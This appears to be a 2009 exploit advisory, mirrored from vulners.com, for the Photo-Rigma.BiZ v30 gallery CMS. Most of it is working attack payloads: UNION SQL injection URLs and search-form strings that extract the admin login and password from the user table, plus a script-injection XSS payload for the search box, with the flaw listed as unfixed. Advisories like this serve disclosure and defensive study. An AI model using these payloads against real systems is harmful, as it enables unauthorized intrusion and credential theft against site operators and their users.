REMOTE SQL INJECTION (SQLi) VULNERABILITY--Photo-Rigma.BiZ v30-->

2009-04-2400:00:00

vulners.com

JSON

REMOTE SQL INJECTION (SQLi) VULNERABILITY--Photo-Rigma.BiZ v30–>

CMS INFORMATION:

–>WEB: http://foto.rigma.biz (affected)
–>DOWNLOAD: http://sourceforge.net/projects/photo-rigmabiz/
–>DEMO: http://foto.rigma.biz
–>CATEGORY: CMS / Portals
–>DESCRIPTION: Photo gallery open source project.

–>RELEASED: 2009-04-24

CMS VULNERABILITY:

–>TESTED ON: firefox 3
–>DORK: N/A
–>CATEGORY: SQL INJECTION (SQLi) / XSS
–>AFFECT VERSION: V30
–>Discovered Bug date: 2009-04-24
–>Reported Bug date: 2009-04-24
–>Fixed bug date: Not fixed
–>Info patch: Not fixed
–>Author: YEnH4ckEr
–>mail: y3nh4ck3r[at]gmail[dot]com
–>WEB/BLOG: N/A
–>COMMENT: A mi novia Marijose…hermano,cunyada, padres (y amigos xD) por su apoyo.
–>EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)

||||||||||||||||||||||||
||||||||||||||||||||||||

----|||| ||||----
----|||| SQL INJECTION ||||----
----|||| ||||----
||||||||||||||||||||||||
||||||||||||||||||||||||

<<<<<<<<єєєєєєєєєєєєєє--------------------єєєєєєєєєєєєєєє>>>>>>>>
CONDITION: magic_quotes_gpc=off
<<<<<<<<єєєєєєєєєєєєє---------------------єєєєєєєєєєєєєєє>>>>>>>>

#######################
#######################

PROOF OF CONCEPT:

#######################
#######################

1.- Get var ::::: "uid":

http://[HOST]/[HOME_PATH]/?action=login&subact=profile&uid=1+AND+0+UNION+ALL+SELECT+1,2,3,version(),database(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*

2.- Search Post Form ::::: "poisk":

%' AND 0 UNION ALL SELECT 1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#



###############
###############
##  EXPLOIT: ##
###############
###############


1.-


http://[HOST]/[HOME_PATH]/?action=login&amp;subact=profile&amp;uid=1+AND+0+UNION+ALL+SELECT+1,2,3,login,password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+FROM+user+WHERE+id=1/*



2.-


&#37;&#39; AND 0 UNION ALL SELECT 1,2,3,concat&#40;login,&#39;&lt;&lt;::&gt;&gt;&#39;,password&#41;,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
FROM user WHERE id=1#



~~~~~----&gt;&gt;Return: login and password for user id one &#40;admin&#41;.



    ||||||||||||||||||||||||
    ||||||||||||||||||||||||
----||||                ||||----
----|||| XSS &#40;SEARCH&#41;   ||||----
----||||                ||||----
    ||||||||||||||||||||||||
    ||||||||||||||||||||||||



Search Post Form --&gt; &quot;&gt;&lt;script&gt;alert&#40;&#39;y3nh4ck3r was here!&#39;&#41;&lt;/script&gt;



#######################################################################
#######################################################################
##*******************************************************************##
##             ESPECIAL GREETZ TO: Str0ke, JosS, etc                 ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
##              GREETZ TO:  SPANISH H4ck3R COMMUNITY                 ##
##*******************************************************************##
#######################################################################
#######################################################################

JSON

REMOTE SQL INJECTION &#40;SQLi&#41; VULNERABILITY--Photo-Rigma.BiZ v30--&gt;